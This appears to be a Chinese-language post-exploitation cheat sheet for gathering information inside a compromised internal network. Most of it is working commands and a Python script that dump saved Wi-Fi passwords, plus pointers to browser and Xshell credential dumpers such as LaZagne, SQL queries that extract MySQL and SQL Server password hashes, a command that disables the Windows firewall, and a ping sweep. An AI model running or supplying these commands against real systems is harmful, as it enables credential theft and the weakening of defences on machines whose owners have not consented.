内网信息收集补充
1. 获取电脑上连接过Wifi的账号密码
1)cmd命令
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
2)python脚本
# -*- coding: UTF-8 -*-
import os
import importlib,sys
import csv
importlib.reload(sys)
# 获取电脑连接过的所有wifi名称和密码
def checkWIFI():
list = []
# 获取所有的wifi名称
message = os.popen('netsh wlan show profiles').readlines()
print('正在解析中,请稍等……')
for i in message:
result = i.strip().encode().decode("utf-8")
if result.find(u"所有用户配置文件 : ") != -1:
command = 'netsh wlan show profiles name="' + result[11:] + '" key=clear'
try:
per_wifi = os.popen(command).readlines()
except:
per_wifi = []
for j in per_wifi:
passwd = j.strip().encode().decode("utf-8")
if passwd.find(u"关键内容 :") != -1:# 密码字符串不为空时
if passwd[18:] != '':
list_temp = []
list_temp.append(result[11:])
list_temp.append(passwd[18:])
list.append(list_temp)
return list
if __name__ == "__main__":
list = checkWIFI()
print("返回结果如下:")
filename='./Result/conWifiInfo.csv'
with open(filename, 'w', encoding='utf-8', newline='') as q:
csv_writer = csv.writer(q)
csv_writer.writerow([ 'ID','wifi名称', '密码'])
i = 0
for j in list:
i = i + 1
print(str(i) + "、wifi名称:" + j[0] + ",密码:" + j[1])
csv_writer.writerow([ i, j[0], j[1]])
2. 获取浏览器中存储的账号密码
2.1 LaZagne
一键抓取目标机器上的所有明文密码
https://github.com/AlessandroZ/LaZagne
2.2 专用工具
http://www.nirsoft.net/utils/web_browser_password.html 火狐浏览器
http://www.nirsoft.net/utils/chromepass.html 谷歌浏览器
2.3 Python脚本
https://github.com/Potato-py/getIntrInfo
3. 获取3389和xshell连接的账号密码
3.1 AsteriskPassword:
星号密码查看器,可以查看xshell、mysql等数据库保存的*号密码
3.2 xshell、xftp密码破解:
https://github.com/dzxs/Xdecrypt
4. 获取mysql账号密码
在mysql数据库下执行以下语句,然后解密
select Host,User,Password,authentication_string from mysql.user;
5. 获取sqlserver账号密码
SELECT name,password_hash FROM master.sys.sql_logins;
6. 防火墙操作
1)查看防火墙状态
netsh firewall show config
2)关闭防火墙
netsh firewall set opmode mode=disable
7. ICMP扫描存活主机:
for /l %i in (1,1,255) do @ping 192.168.1.%i -w 1 -n 1 | find /i "ttl"